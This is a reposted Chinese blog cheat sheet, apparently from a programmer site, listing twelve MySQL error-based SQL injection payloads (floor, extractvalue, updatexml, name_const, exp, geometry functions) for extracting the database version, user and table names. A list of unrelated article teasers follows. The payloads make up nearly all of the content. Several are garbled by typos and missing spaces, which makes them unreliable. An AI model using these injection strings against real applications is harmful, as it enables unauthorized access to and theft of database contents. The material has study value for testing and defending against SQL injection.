SQL报错注入的12个函数及sql注入语句-程序员宅基地

技术标签: 数据库  

转来的 侵删

1、通过floor报错,注入语句如下:   

 

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

 

2、通过ExtractValue报错,注入语句如下:

 

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

 

3、通过UpdateXml报错,注入语句如下:

 

and 1=(updatexml(1,concat(0x3a,(selectuser())),1))

 

4、通过NAME_CONST报错,注入语句如下:

 

and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

 

5、通过join报错,注入语句如下:

 

select * from(select * from mysql.user ajoin mysql.user b)c;

 

6、通过exp报错,注入语句如下:

 

and exp(~(select * from (select user () ) a) );

 

7、通过GeometryCollection()报错,注入语句如下:

 

and GeometryCollection(()select *from(select user () )a)b );

 

8、通过polygon ()报错,注入语句如下:

 

and polygon (()select * from(select user ())a)b );

 

9、通过multipoint ()报错,注入语句如下:

 

and multipoint (()select * from(select user() )a)b );

 

10、通过multlinestring ()报错,注入语句如下:

 

and multlinestring (()select * from(selectuser () )a)b );

 

11、通过multpolygon ()报错,注入语句如下:

 

and multpolygon (()select * from(selectuser () )a)b );

 

12、通过linestring ()报错,注入语句如下:

 

and linestring (()select * from(select user() )a)b );

 join报错注入

转载于:https://www.cnblogs.com/fengshui/p/9282991.html

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30852451/article/details/98668307

智能推荐

设计模式篇章(4)——十一种行为型模式_设计模式行为11种-程序员宅基地

文章浏览阅读1.2k次,点赞23次,收藏13次。这个设计模式主要思考的是如何分配对象的职责和将对象之间相互协作完成单个对象无法完成的任务,这个与结构型模式有点像,结构型可以理解为静态的组合,例如将不同的组件拼起来成为一个更大的组件;而行为型更是一种动态或者具有某个动作触发的事件,具有一定行为的设计模式。现在不清楚没关系,学完23种设计模式再回头看就能理解了。行为型模式包括:模板方法模式、策略模式、命令模式、职责链模式、状态模式、观察者模式、中介者模式、迭代器模式、访问者模式、备忘录模式、解释器模式共11种。_设计模式行为11种

邹检验,结构变化识别及其R语言实现_r语言 sctest-程序员宅基地

文章浏览阅读1.1k次。邹检验Chow test提供了最基本的一种结构变化显著性的检验方法,后续统计学者提供了复杂结构变化的识别和判定方法。针对情形2和3,Andrews(1993,2003)开发了sup-Wald(即一系列Wald检验的上确界)方法,sup-LM(即一系列拉格朗日乘数统计量的上确界)方法和sup-LR(即一系列极大似然比的上确界)方法用以检验结构变化。邹检验通过比较总样本回归的残差平方和与分组样本回归残差平方和之间的差值,构造了一个统计变量,该变量符合F分布,可以作为显著性的判断依据。结构变化检验的R语言实现。_r语言 sctest

ext2.2时间控件在IE8下显示不完整的问题_时间ie8下不显示-程序员宅基地

文章浏览阅读480次。转载http://www.cnblogs.com/lwjacky/archive/2009/12/08/1619723.html_时间ie8下不显示

七年阿里升级路,熬到P7,想给正在成长的Java程序员一点建议-程序员宅基地

文章浏览阅读792次,点赞26次,收藏11次。切莫死记硬背,小心面试官直接让你出门右拐1000道互联网Java面试题:

联邦学习的信息泄露_联邦学习梯度泄露-程序员宅基地

文章浏览阅读406次,点赞2次,收藏6次。联邦学习一词是由McMahan等人引入的《Communication-efficient learning of deep networks from decentralized data》。联邦学习的基础结构为:n个客户端(如移动设备等)在联邦服务器(如服务供应商)的协调下协作训练模型,而客户端的训练数据由本地存储而不直接提供给服务器。本文主要总结了现有针对联邦学习的攻击和防御的策略_联邦学习梯度泄露

[计算机效率] 定时关机重启工具:MiniShutoff_免费定时重启-程序员宅基地

文章浏览阅读558次,点赞7次,收藏5次。MiniShutoff是一款免费的定时关机软件,主要功能包括定时关机、重启和锁定计算机。_免费定时重启

随便推点

2024|CISP认证详细报考流程和条件_cisp报考-程序员宅基地

文章浏览阅读1.2k次,点赞11次,收藏30次。CISP(Certified Information Security Professional,注册信息安全专业人员)证书是由中国信息安全测评中心(CNITSEC)颁发的专业资质证书,旨在为信息安全领域培养和认证具备一定专业水平的安全人才。CISP证书在中国信息安全行业中具有较高的认可度,适用于信息安全企业、咨询服务机构、政府机构、企事业单位等从事信息安全相关工作的专业人员。_cisp报考

ADS(Advanced Design system)原理图结合板层结构仿真(MSub)及版图仿真(EM Simulation)_ads版图仿真-程序员宅基地

文章浏览阅读2.7w次,点赞37次,收藏264次。ADS(Advanced Design system)原理图结合板层结构仿真(MSub)及版图仿真(EM Simulation)_ads版图仿真

bzoj1001: [BeiJing2006]狼抓兔子-程序员宅基地

文章浏览阅读1.4k次。1001: [BeiJing2006]狼抓兔子Time Limit: 15 Sec MemoryLimit: 162 MBDescription现在小朋友们最喜欢的"喜羊羊与灰太狼",话说灰太狼抓羊不到,但抓兔子还是比较在行的,而且现在的兔子还比较笨,它们只有两个窝,现在你做为狼王,面对下面这样一个网格的地形: 左上角点为(1,1),右下角点为(N,M)(上图中N=4

基于Java+Vue+uniapp微信小程序学生管理系统设计和实现_uni-app 学员信息管理系统-程序员宅基地

文章浏览阅读889次,点赞20次,收藏17次。互联网发展至今,无论是其理论还是技术都已经成熟,而且它广泛参与在社会中的方方面面。它让信息都可以通过网络传播,搭配信息管理工具可以很好地为人们提供服务。针对高校教师成果信息管理混乱,出错率高,信息安全性差,劳动强度大,费时费力等问题,采用小程序学生管理系统可以有效管理,使信息管理能够更加科学和规范。小程序学生管理系统使用Java语言进行编码,使用Mysql创建数据表保存本系统产生的数据。系统可以提供信息显示和相应服务,其管理小程序学生管理系统信息,查看小程序学生管理系统信息,管理小程序学生管理系统。_uni-app 学员信息管理系统

Python Collections 模块 - 2 Tuple功能详解_to_2tuple-程序员宅基地

文章浏览阅读1.2k次。1. 迭代# -*- coding: utf-8 -*-__autor__ = "TOM"name_list = ["Tom1","Tom2"] # 常用for循环遍历listfor name in name_list: print(name)name_tuple = ("Tom3","Tom4") # tuple也可以遍历;for name in name..._to_2tuple

Tree树结构java实现-程序员宅基地

文章浏览阅读2.1k次。import java.util.ArrayList;import java.util.Arrays;import java.util.List;/** * 树状结构 * * * @param <T> 树中数据的类型 */public class Tree<T>{ private T data; /** * 子树(节点) */ private List<Tree<T>> childs; /** * 父节点..

推荐文章

热门文章

相关标签